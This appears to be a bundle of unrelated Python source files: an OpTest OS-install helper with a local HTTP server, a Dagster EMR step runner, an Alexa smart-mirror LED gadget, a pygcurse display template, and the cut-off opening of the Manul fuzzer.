# OpTest Install Utils
#
import shutil
import urllib2
import os
import threading
import SocketServer
import BaseHTTPServer
import SimpleHTTPServer
import cgi
import commands
import time
from Exceptions import CommandFailed, UnexpectedCase
import OpTestConfiguration
from common.OpTestSystem import OpSystemState
import logging
import OpTestLogger
log = OpTestLogger.optest_logger_glob.get_logger(__name__)
BASE_PATH = ""
INITRD = ""
VMLINUX = ""
KS = ""
DISK = ""
USERNAME = ""
PASSWORD = ""
REPO = ""
BOOTPATH = ""
uploaded_files = {}
class InstallUtil():
def __init__(self, base_path="", initrd="", vmlinux="",
ks="", boot_path="", repo=""):
global BASE_PATH
global INITRD
global VMLINUX
global KS
global DISK
global USERNAME
global PASSWORD
global BOOTPATH
global REPO
global PROXY
self.conf = OpTestConfiguration.conf
self.cv_HOST = self.conf.host()
self.cv_SYSTEM = self.conf.system()
self.server = ""
self.repo = self.conf.args.os_repo
REPO = self.repo
DISK = self.cv_HOST.get_scratch_disk()
USERNAME = self.cv_HOST.username()
PASSWORD = self.cv_HOST.password()
BOOTPATH = boot_path
BASE_PATH = base_path
INITRD = initrd
VMLINUX = vmlinux
PROXY = self.cv_HOST.get_proxy()
KS = ks
def wait_for_network(self):
retry = 6
while retry > 0:
try:
self.cv_SYSTEM.console.run_command("ifconfig -a", retry=5)
return True
except CommandFailed as cf:
log.debug("wait_for_network CommandFailed={}".format(cf))
if cf.exitcode is 1:
time.sleep(5)
retry = retry - 1
pass
else:
log.debug("wait_for_network ELSE raise cf={}".format(cf))
raise cf
def ping_network(self):
retry = 6
while retry > 0:
try:
ip = self.conf.args.host_gateway
log.debug("ping_network ip={}".format(ip))
if ip in [None, ""]:
ip = self.cv_SYSTEM.get_my_ip_from_host_perspective()
log.debug("ping_network tried to get new ip={}".format(ip))
cmd = "ping %s -c 1" % ip
log.debug("ping_network retry=50, use this to gauge if network problems, "
" compare with run_command logging to help figure out whats wrong")
output = self.cv_SYSTEM.console.run_command(cmd, retry=50)
log.debug("ping_network output={}".format(output))
return True
except CommandFailed as cf:
log.debug("ping_network Exception={}".format(cf))
if retry == 1:
log.debug("ping_network raise cf={}".format(cf))
raise cf
if cf.exitcode is 1:
time.sleep(5)
retry = retry - 1
log.debug("ping_network Exception path, retry={}".format(retry))
pass
else:
log.debug("ping_network Exception path ELSE, raise cf={}".format(cf))
raise cf
def assign_ip_petitboot(self):
"""
Assign host ip in petitboot
"""
# Lets reduce timeout in petitboot
self.cv_SYSTEM.console.run_command("nvram --update-config petitboot,timeout=10", retry=5)
# this will not work without these
if not self.conf.args.host_mac \
or not self.conf.args.host_submask \
or not self.conf.args.host_gateway \
or not self.conf.args.host_dns:
my_msg = ("We need host_mac/host_submask/host_gateway/host_dns provided"
" on command line args or via configuration files.")
noconfig_exception = UnexpectedCase(state="assign_ip_petitboot config", message=my_msg)
raise noconfig_exception
cmd = ("ip addr|grep -B1 -i %s |grep BROADCAST|awk -F ':' '{print $2}'" % (self.conf.args.host_mac))
log.debug("ip addr cmd={}".format(cmd, type(cmd)))
iface = self.cv_SYSTEM.console.run_command(cmd, retry=5)
log.debug("iface={} type={} len={}".format(iface, type(iface), len(iface)))
if len(iface) >=1:
iface = self.cv_SYSTEM.console.run_command(cmd)[0].strip()
else:
my_msg = ("We did NOT get interface back from query, UNABLE to proceed with trying to "
"setup the IP, check that Petitboot or Host OS is configured properly.")
noface_exception = UnexpectedCase(state="assign_ip_petitboot interface", message=my_msg)
raise noiface_exception
cmd = ("ifconfig %s %s netmask %s" % (iface, self.cv_HOST.ip, self.conf.args.host_submask))
log.debug("ifconfig cmd={}".format(cmd))
self.cv_SYSTEM.console.run_command(cmd, retry=5)
cmd = ("route add default gateway %s" % self.conf.args.host_gateway)
log.debug("route cmd={}".format(cmd))
self.cv_SYSTEM.console.run_command_ignore_fail(cmd)
cmd = ("echo 'nameserver %s' > /etc/resolv.conf" % self.conf.args.host_dns)
log.debug("nameserver cmd={}".format(cmd))
self.cv_SYSTEM.console.run_command(cmd, retry=5)
def configure_host_ip(self):
self.wait_for_network()
# Check if ip is assigned in petitboot
try:
self.ping_network()
except CommandFailed as cf:
log.debug("configure_host_ip CommandFailed={}".format(cf))
try:
self.assign_ip_petitboot()
self.ping_network()
except Exception as e:
log.debug("configure_host_ip Exception={}".format(e))
my_msg = "We failed to setup Petitboot or Host IP, check that the IP's are configured and any other configuration parms"
noconfig_exception = UnexpectedCase(state="configure_host_ip", message=my_msg)
raise noconfig_exception
def get_server_ip(self):
"""
Get IP of server where test runs
"""
my_ip = ""
try:
self.configure_host_ip()
except Exception as e:
my_msg = "Exception trying configure_host_ip, e={}".format(e)
configure_exception = UnexpectedCase(state="get_server_ip", message=my_msg)
raise configure_exception
retry = 30
while retry > 0:
try:
my_ip = self.cv_SYSTEM.get_my_ip_from_host_perspective()
log.debug("get_server_ip my_ip={}".format(my_ip))
if not my_ip:
my_msg = "We were not able to get IP from Petitboot or Host, check that the IP is configured"
noip_exception = UnexpectedCase(state="get_server_ip", message=my_msg)
raise noip_exception
output = self.cv_SYSTEM.console.run_command("ping {} -c 1".format(my_ip), retry=5)
log.debug("get_server_ip output={}".format(output))
break
except CommandFailed as cf:
log.debug("get_server_ip CommandFailed cf={}".format(cf))
if cf.exitcode is 1:
time.sleep(1)
retry = retry - 1
pass
else:
log.debug("get_server_ip Exception={}".format(cf))
raise cf
return my_ip
def get_uploaded_file(self, name):
return uploaded_files.get(name)
def start_server(self, server_ip):
"""
Start local http server
"""
HOST, PORT = "0.0.0.0", 0
global REPO
self.server = ThreadedHTTPServer((HOST, PORT), ThreadedHTTPHandler)
ip, port = self.server.server_address
if not REPO:
REPO = "http://%s:%s/repo" % (server_ip, port)
print("# Listening on %s:%s" % (ip, port))
server_thread = threading.Thread(target=self.server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("# Server running in thread:", server_thread.name)
return port
def stop_server(self):
"""
Stops local http server
"""
self.server.shutdown()
self.server.server_close()
return
def setup_repo(self, cdrom):
"""
Sets up repo from given cdrom.
Check if given cdrom is url or file
if url, download in the BASE_PATH and
mount to repo folder
:params cdrom: OS cdrom path local or remote
"""
repo_path = os.path.join(BASE_PATH, 'repo')
abs_repo_path = os.path.abspath(repo_path)
# Clear already mount repo
if os.path.ismount(repo_path):
status, output = commands.getstatusoutput("umount %s" % abs_repo_path)
if status != 0:
print("failed to unmount", abs_repo_path)
return ""
elif os.path.isdir(repo_path):
shutil.rmtree(repo_path)
else:
pass
if not os.path.isdir(repo_path):
os.makedirs(abs_repo_path)
if os.path.isfile(cdrom):
cdrom_path = cdrom
else:
cdrom_url = urllib2.urlopen(cdrom)
if not cdrom_url:
print("Unknown cdrom path %s" % cdrom)
return ""
with open(os.path.join(BASE_PATH, "iso"), 'wb') as f:
f.write(cdrom_url.read())
cdrom_path = os.path.join(BASE_PATH, "iso")
cmd = "mount -t iso9660 -o loop %s %s" % (cdrom_path, abs_repo_path)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print("Failed to mount iso %s on %s\n %s", (cdrom, abs_repo_path,
output))
return ""
return abs_repo_path
def extract_install_files(self, repo_path):
"""
extract the install file from given repo path
:params repo_path: os repo path either local or remote
"""
vmlinux_src = os.path.join(repo_path, BOOTPATH, VMLINUX)
initrd_src = os.path.join(repo_path, BOOTPATH, INITRD)
vmlinux_dst = os.path.join(BASE_PATH, VMLINUX)
initrd_dst = os.path.join(BASE_PATH, INITRD)
# let us make sure, no old vmlinux, initrd
if os.path.isfile(vmlinux_dst):
os.remove(vmlinux_dst)
if os.path.isfile(initrd_dst):
os.remove(initrd_dst)
if os.path.isdir(repo_path):
try:
shutil.copyfile(vmlinux_src, vmlinux_dst)
shutil.copyfile(initrd_src, initrd_dst)
except Exception:
return False
else:
vmlinux_file = urllib2.urlopen(vmlinux_src)
initrd_file = urllib2.urlopen(initrd_src)
if not (vmlinux_file and initrd_file):
print("Unknown repo path %s, %s" % (vmlinux_src, initrd_src))
return False
try:
with open(vmlinux_dst, 'wb') as f:
f.write(vmlinux_file.read())
with open(initrd_dst, 'wb') as f:
f.write(initrd_file.read())
except Exception:
return False
return True
def set_bootable_disk(self, disk):
"""
Sets the given disk as default bootable entry in petitboot
"""
self.cv_SYSTEM.sys_set_bootdev_no_override()
# FIXME: wait till the device(disk) discovery in petitboot
time.sleep(60)
cmd = 'blkid %s*' % disk
output = self.cv_SYSTEM.console.run_command(cmd)
uuid = output[0].split(':')[1].split('=')[1].replace("\"", "")
cmd = 'nvram --update-config "auto-boot?=true"'
output = self.cv_SYSTEM.console.run_command(cmd)
cmd = 'nvram --update-config petitboot,bootdevs=uuid:%s' % uuid
output = self.cv_SYSTEM.console.run_command(cmd)
cmd = 'nvram --print-config'
output = self.cv_SYSTEM.console.run_command(cmd)
return
def get_boot_cfg(self):
"""
Find bootloader cfg file path of host.
:return: bootloader cfg file path, empty string if no cfg file found.
"""
con = self.cv_SYSTEM.cv_HOST.get_ssh_connection()
bootloader_cfg = [
'/boot/grub/grub.conf',
'/boot/grub2/grub.cfg',
'/etc/grub.conf',
'/etc/grub2.cfg',
'/boot/etc/yaboot.conf',
'/etc/default/grub'
]
cfg_path = ''
for path in bootloader_cfg:
cmd = "test -f %s" % path
try:
con.run_command(cmd)
cfg_path = path
except CommandFailed:
continue
return cfg_path
def check_kernel_cmdline(self, args="", remove_args=""):
"""
Method to check whether args are already exists or not in /proc/cmdline
:param args: arguments to be checked whether already exists or to add
:param remove_args: arguments to be checked whether it doesn't exists
or to remove.
:return: required arguments to be added/removed of type str
"""
req_args = ""
req_remove_args = ""
check_cmd = "cat /proc/cmdline"
con = self.cv_SYSTEM.cv_HOST.get_ssh_connection()
try:
check_output = con.run_command(check_cmd, timeout=60)[0].split()
for each_arg in args.split():
if each_arg not in check_output:
req_args += "%s " % each_arg
for each_arg in remove_args.split():
if each_arg in check_output:
req_remove_args += "%s " % each_arg
except CommandFailed as Err:
print("Failed to get kernel commandline using %s: %s" %
(Err.command, Err.output))
return req_args.strip(), req_remove_args.strip()
def update_kernel_cmdline(self, args="", remove_args="", reboot=True):
"""
Update default Kernel cmdline arguments
:param args: Kernel option to be included
:param remove_args: Kernel option to be removed
:param reboot: whether to reboot the host or not
:return: True on success and False on failure
"""
con = self.cv_SYSTEM.cv_HOST.get_ssh_connection()
req_args, req_remove_args = self.check_kernel_cmdline(args,
remove_args)
try:
con.run_command("grubby --help", timeout=60)
cmd = 'grubby --update-kernel=`grubby --default-kernel` '
if req_args:
cmd += '--args="%s" ' % req_args
if req_remove_args:
cmd += '--remove-args="%s"' % req_remove_args
try:
con.run_command(cmd)
except CommandFailed as Err:
print("Failed to update kernel commandline using %s: %s" %
(Err.command, Err.output))
return False
# If grubby is not available fallback by changing grub file
except CommandFailed:
grub_key = "GRUB_CMDLINE_LINUX_DEFAULT"
boot_cfg = self.get_boot_cfg()
cmd = ("cat %s | grep %s | awk -F '=' '{print $2}'" %
(boot_cfg, grub_key))
try:
output = con.run_command(cmd, timeout=60)[0].strip("\"")
if req_args:
output += " %s" % req_args
if req_remove_args:
for each_arg in req_remove_args.split():
output = output.strip(each_arg).strip()
except CommandFailed as Err:
print("Failed to get the kernel commandline - %s: %s" %
(Err.command, Err.output))
return False
if req_args or req_remove_args:
try:
cmd = "sed -i 's/%s=.*/%s=\"%s\"/g' %s" % (grub_key, grub_key,
output, boot_cfg)
con.run_command(cmd, timeout=60)
con.run_command("update-grub")
except CommandFailed as Err:
print("Failed to update kernel commandline - %s: %s" %
(Err.command, Err.output))
return False
if reboot and (req_args or req_remove_args):
# Reboot the host for the kernel command to reflect
self.cv_SYSTEM.goto_state(OpSystemState.OFF)
self.cv_SYSTEM.goto_state(OpSystemState.OS)
# check for added/removed args in /proc/cmdline
req_args, req_remove_args = self.check_kernel_cmdline(args,
remove_args)
if req_args:
print("Failed to add arg %s in the cmdline %s" %
(args, output))
return False
if req_remove_args:
print("Failed to remove arg %s in the cmdline %s" %
(remove_args, output))
return False
return True
class ThreadedHTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_HEAD(self):
# FIXME: Local repo unable to handle http request while installation
# Avoid using cdrom if your kickstart file needs repo, if installation
# just needs vmlinx and initrd from cdrom, cdrom still can be used.
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
def do_GET(self):
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
print("# Webserver was asked for: ", self.path)
if self.path == "/%s" % VMLINUX:
f = open("%s/%s" % (BASE_PATH, VMLINUX), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % INITRD:
f = open("%s/%s" % (BASE_PATH, INITRD), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % KS:
f = open("%s/%s" % (BASE_PATH, KS), "r")
d = f.read()
if "hostos" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "rhel" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "ubuntu" in BASE_PATH:
user = USERNAME
if user == 'root':
user = 'ubuntu'
packages = "openssh-server build-essential lvm2 ethtool "
packages+= "nfs-common ssh ksh lsvpd nfs-kernel-server iprutils procinfo "
packages+= "sg3-utils lsscsi libaio-dev libtime-hires-perl "
packages+= "acpid tgt openjdk-8* zip git automake python "
packages+= "expect gcc g++ gdb "
packages+= "python-dev p7zip python-stevedore python-setuptools "
packages+= "libvirt-dev numactl libosinfo-1.0-0 python-pip "
packages+= "linux-tools-common linux-tools-generic lm-sensors "
packages+= "ipmitool i2c-tools pciutils opal-prd opal-utils "
packages+= "device-tree-compiler fwts stress"
ps = d.format("openpower", "example.com",
PROXY, PASSWORD, PASSWORD, user, PASSWORD, PASSWORD, DISK, packages)
else:
print("unknown distro")
self.wfile.write(ps)
return
else:
self.send_response(404)
return
def do_POST(self):
path = os.path.normpath(self.path)
path = path[1:]
path_elements = path.split('/')
print("INCOMING")
print(repr(path))
print(repr(path_elements))
if path_elements[0] != "upload":
return
form = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ={ "REQUEST_METHOD": "POST",
"CONTENT_TYPE": self.headers['Content-Type']})
uploaded_files[form["file"].filename] = form["file"].value
self.wfile.write("Success")
class ThreadedHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
|
emr_step_main.py
|
import io
import os
import pickle
import sys
import time
from queue import Empty, Queue
from threading import Thread
import boto3
from dagster_aws.s3.file_manager import S3FileHandle, S3FileManager
from dagster.core.execution.plan.external_step import PICKLED_EVENTS_FILE_NAME, run_step_from_ref
DONE = object()
def main(step_run_ref_bucket, s3_dir_key):
session = boto3.client("s3")
file_manager = S3FileManager(session, step_run_ref_bucket, "")
file_handle = S3FileHandle(step_run_ref_bucket, s3_dir_key)
step_run_ref_data = file_manager.read_data(file_handle)
step_run_ref = pickle.loads(step_run_ref_data)
events_bucket = step_run_ref_bucket
events_s3_key = os.path.dirname(s3_dir_key) + "/" + PICKLED_EVENTS_FILE_NAME
def put_events(events):
file_obj = io.BytesIO(pickle.dumps(events))
session.put_object(Body=file_obj, Bucket=events_bucket, Key=events_s3_key)
# Set up a thread to handle writing events back to the plan process, so execution doesn't get
# blocked on remote communication
events_queue = Queue()
event_writing_thread = Thread(
target=event_writing_loop, kwargs=dict(events_queue=events_queue, put_events_fn=put_events),
)
event_writing_thread.start()
try:
for event in run_step_from_ref(step_run_ref):
events_queue.put(event)
finally:
events_queue.put(DONE)
event_writing_thread.join()
def event_writing_loop(events_queue, put_events_fn):
"""
Periodically check whether the step has posted any new events to the queue. If they have,
write ALL events (not just the new events) to an S3 bucket.
This approach was motivated by a few challenges:
* We can't expect a process on EMR to be able to hit an endpoint in the plan process, because
the plan process might be behind someone's home internet.
* We can't expect the plan process to be able to hit an endpoint in the process on EMR, because
EMR is often behind a VPC.
* S3 is eventually consistent and doesn't support appends
"""
all_events = []
done = False
got_new_events = False
time_posted_last_batch = time.time()
while not done:
try:
event_or_done = events_queue.get(timeout=1)
if event_or_done == DONE:
done = True
else:
all_events.append(event_or_done)
got_new_events = True
except Empty:
pass
enough_time_between_batches = time.time() - time_posted_last_batch > 1
if got_new_events and (done or enough_time_between_batches):
put_events_fn(all_events)
got_new_events = False
time_posted_last_batch = time.time()
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2])
|
agt_smart_mirror.py
|
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# These materials are licensed under the Amazon Software License in connection with the Alexa Gadgets Program.
# The Agreement is available at https://aws.amazon.com/asl/.
# See the Agreement for the specific terms and conditions of the Agreement.
# Capitalized terms not defined in this file have the meanings given to them in the Agreement.
#
import json
import logging
import sys
import threading
import time
from enum import Enum
from datetime import datetime
import dateutil.parser
import traceback
import webcolors
import board
import neopixel
from agt import AlexaGadget
from smart_mirror import SmartMirror
from parameter_store_helper import fetch_and_store_parameters, get_parameters, SmartMirrorConfig
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
class Actions(Enum):
Off = 0
Rainbow = 1
Breathe = 2
ShowColor = 3
Clock = 4
Timer = 5
Police = 6
class SmartMirrorGadget(AlexaGadget):
"""
An Alexa Gadget for your simple smart mirror.
"""
def __init__(self):
super().__init__()
self.config = self.get_parameters()
self.smart_mirror = SmartMirror(self.config)
#This sets what action is starte when the mirror starts
self.defaultAction = Actions.Clock
self.currentAction = self.defaultAction
self.lastAction = self.defaultAction
# Boolean that tells the loop if it should execute actions or not - default is True which means that the configured default action (self.defaultAction)
# will be used
self.keep_cycling = True
#default options for show color as a reference
self.showColorOptions = {
'color': webcolors.name_to_rgb('yellow')
}
#default options for timer
self.showTimerOptions = {
'startTime': None,
'endTime': None,
'color': webcolors.name_to_rgb('red'),
'timer_token': None
}
# Setup a lock to be used for avoiding race conditions
# during color animation state updates
self.lock = threading.Lock()
self.loop_thread = threading.Thread(target=self.loop)
self.loop_thread.start()
def get_parameters(self):
"""
Gets the parameters from parameter store
"""
try:
fetch_and_store_parameters()
parameters = get_parameters()
return SmartMirrorConfig(parameters)
except:
return SmartMirrorConfig({})
def startAction(self, action):
"""
Call this function to start a specific action
"""
logger.info(f'Starting Action {action}')
self.lock.acquire()
self.lastAction = self.currentAction
self.currentAction = action
self.keep_cycling = True
self.lock.release()
def stopAction(self):
"""
Call this action to end the current action - turn all LEDs off
"""
self.lock.acquire()
self.lastAction = Actions.Off
self.currentAction = Actions.Off
self.keep_cycling = False
self.lock.release()
def loop(self):
"""
Main function of this class. This is an endless loop running in a separate thread. It will check what action to run on each iteration.
"""
while True:
# Check if anything should be visualized
if self.keep_cycling:
logger.info(f'{self.currentAction} is on')
try:
if self.currentAction == Actions.Off:
time.sleep(0.1)
if self.currentAction == Actions.Rainbow:
self.smart_mirror.rainbow_cycle(0.001)
if self.currentAction == Actions.Breathe:
self.smart_mirror.breathe()
if self.currentAction == Actions.Police:
self.smart_mirror.police()
if self.currentAction == Actions.Clock:
self.smart_mirror.clock()
if self.currentAction == Actions.ShowColor:
self.smart_mirror.showColor(
self.showColorOptions['color'])
if self.currentAction == Actions.Timer:
timerPosition = self.getCurrentTimerPosition()
if(timerPosition != 0):
self.smart_mirror.showRange(0, timerPosition, 0.1, self.showTimerOptions['color'])
else:
self.smart_mirror.showColor(self.showTimerOptions['color'])
except Exception as e:
logger.info(f'Error in loop: {e}')
logger.error(f'Stack: {traceback.format_exc()}')
time.sleep(0.1)
else:
logger.info('Nothing is on')
self.smart_mirror.reset()
time.sleep(0.1)
def on_alexa_gadget_statelistener_stateupdate(self, directive):
"""
This will trigger when your connected Alexa device changes state. Here we listening for your Alexa to react to you saying "Alexa..." or "Echo..."
"""
for state in directive.payload.states:
if state.name == 'wakeword':
if state.value == 'active':
logger.info('Wake word active')
self.showColorOptions['color'] = webcolors.name_to_rgb('yellow')
self.startAction(Actions.ShowColor)
elif state.value == 'cleared':
logger.info('Wake word cleared')
self.startAction(self.lastAction)
def on_alerts_setalert(self, directive):
"""
Handles setting of alerts on your connected Alexa device e.g. "Alexa set timer for 60 seconds"
"""
if directive.payload.type != 'TIMER':
logger.info(
"Received SetAlert directive but type != TIMER. Ignorning")
return
endTime = dateutil.parser.parse(directive.payload.scheduledTime).timestamp()
now = time.time()
if endTime <= 0:
logger.info(
"Received SetAlert directive but scheduledTime has already passed. Ignoring")
return
if self.showTimerOptions['timer_token'] == directive.payload.token:
logger.info(
"Received SetAlert directive to update to currently running timer. Adjusting")
self.showTimerOptions['endTime'] = endTime
return
if self.currentAction == Actions.Timer:
logger.info(
"Received SetAlert directive but another timer is already running. Ignoring")
return
logger.info("Received SetAlert directive. Starting a timer. " +
str(int(endTime - now)) + " seconds left..")
self.showTimerOptions['endTime'] = endTime
self.showTimerOptions['startTime'] = now
self.showTimerOptions['timer_token'] = directive.payload.token
self.showTimerOptions['color'] = webcolors.name_to_rgb('red')
self.startAction(Actions.Timer)
def on_alerts_deletealert(self, directive):
"""
Handles deletion of alert - reverts back to default action
"""
self.startAction(self.defaultAction)
def getCurrentTimerPosition(self):
"""
Figure out how many LEDs should be turned on. If the timer is up all 60 LEDs shoul be lit.
"""
start_time = self.showTimerOptions['startTime']
logger.info("start_time " + str(start_time) + " in timer") # Log stuff
end_time = self.showTimerOptions['endTime']
logger.info("end_time " + str(end_time) + " in timer") # Log stuff
current_time = time.time()
logger.info("current_time " + str(current_time) +
" in timer") # Log stuff
timer_total = int(end_time - start_time)
logger.info("timer_total " + str(timer_total) +
" in timer") # Log stuff
timer_left = int(max(0, end_time - current_time))
logger.info("timer_left " + str(timer_left) + " in timer") # Log stuff
if timer_left > 0:
nextPosition = int((timer_total - timer_left)/timer_total * self.config.LedCount)
logger.info("Next position " + str(nextPosition) +
" in timer") # Log stuff
logger.info("LedCount/Modulo:" +
str(self.config.LedCount)) # Log stuff
time.sleep(1)
return nextPosition # Light up the leds
else:
return 0
# this matches the namespace that the skill adds in the payload (see lambda_function.py): (namespace='Custom.SmartMirror', name='Rainbow'),
def on_custom_smartmirror_rainbow(self, directive):
"""
Handles Custom.SmartMirror.Rainbow directive
"""
logger.info('show rainbow directive called')
self.startAction(Actions.Rainbow)
# this matches the namespace that the skill adds in the payload (see lambda_function.py): (namespace='Custom.SmartMirror', name='Color'),
def on_custom_smartmirror_color(self, directive):
"""
Handles Custom.SmartMirror.Color directive
"""
payload = json.loads(directive.payload.decode("utf-8"))
color = payload['color'].lower() #this is the color name coming in from Alexa
rgb = webcolors.name_to_rgb(color)
logger.info(f'show color directive called with color {color} => {rgb}')
self.showColorOptions['color'] = rgb
self.startAction(Actions.ShowColor)
# this matches the namespace that the skill adds in the payload (see lambda_function.py): (namespace='Custom.SmartMirror', name='Clock'),
def on_custom_smartmirror_clock(self, directive):
"""
Handles Custom.SmartMirror.Clock directive
"""
logger.info('show clock directive called')
self.startAction(Actions.Clock)
def on_custom_smartmirror_police(self, directive):
"""
Handles Custom.SmartMirror.Police directive
"""
logger.info('Blink like the Police')
self.startAction(Actions.Police)
def on_custom_smartmirror_stopled(self, directive):
"""
Handles Custom.ColorCyclerGadget.StopLED directive sent from skill
by stopping the LED animations
"""
logger.info('StopLED directive received: Turning off LED')
self.stopAction()
def reset(self):
"""
Turn off all LEDs by calling the reset function
"""
try:
self.smart_mirror.reset()
except:
print(f'failed to reset')
if __name__ == '__main__':
gadget = SmartMirrorGadget()
try:
gadget.main()
finally:
gadget.reset()
|
template.py
|
import pygame, pygcurse
from pygame.locals import *
# import LED_display as LD
# import threading
import time
import copy
import os
delay = 0.1
#t=threading.Thread(target=LD.main, args=())
#t.setDaemon(True)
#t.start()
iScreen =[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
# - Pygcurse board
win = pygcurse.PygcurseWindow(32, 16, fullscreen=False)
def main():
os.system('cls' if os.name == 'nt' else 'clear')
i = 0
j = 0
while True:
oScreen = copy.deepcopy(iScreen)
win.fill('@', fgcolor='black', bgcolor='black')
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
# fill matrix
# - Change oScreen matrix output in this area
#ex)
j += 1
if j == 32:
i += 1
j = 0
if i == 16:
i = 0
oScreen[i][j] = 1
# - Draw Matrix
consoleMatrix(oScreen)
pygcurseMatrix(oScreen)
# drawMatrix(oScreen)
time.sleep(delay)
os.system('cls' if os.name == 'nt' else 'clear')
def consoleMatrix(screen):
for i in screen:
print(i)
def pygcurseMatrix(screen):
for i in range(16):
for j in range(32):
if screen[i][j] == 1:
win.putchar('@', j, i, 'white')
elif screen[i][j] == 2:
win.putchar('@', j, i, 'green')
#default color = 'white', 'yellow' ,'fuchsia' ,'red', 'silver', 'gray', 'olive', 'purple', 'maroon', 'aqua', 'lime', 'teal', 'green', 'blue', 'navy', 'black'
win.update()
#def drawMatrix(array):
# for x in range(len(array[0])):
# for y in range(len(array)):
# if array[y][x] == 0:
# LD.set_pixel(x, y, 0)
# elif array[y][x] == 1:
# LD.set_pixel(x, y, 2)
# elif array[y][x] == 2:
# LD.set_pixel(x, y, 7)
# elif array[y][x] == 3:
# LD.set_pixel(x, y, 1)
# else:
# continue
if __name__ == '__main__':
main()
|
manul.py
|
# Manul - main module
# -------------------------------------
# Maksim Shudrak <mshudrak@salesforce.com> <mxmssh@gmail.com>
#
# Copyright 2019 Salesforce.com, inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os import listdir
from os.path import isfile, join
import shutil
from ctypes import *
import multiprocessing
import argparse
from timeit import default_timer as timer
import ntpath
from printing import *
from manul_utils import *
from manul_win_utils import *
import manul_network
import random
import afl_fuzz
import zlib
import importlib
import dbi_mode
import radamsa
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
xrange = range
else:
string_types = basestring,
xrange = xrange
import subprocess, threading
import signal
net_process_is_up = None
net_sleep_between_cases = 0
INIT_WAIT_TIME = 0
class ForkServer(object):
def __init__(self, timeout):
self.control = os.pipe()
self.status = os.pipe()
self.r_fd = None
self.timeout = timeout
def init_forkserver(self, cmd):
processid = os.fork()
if processid:
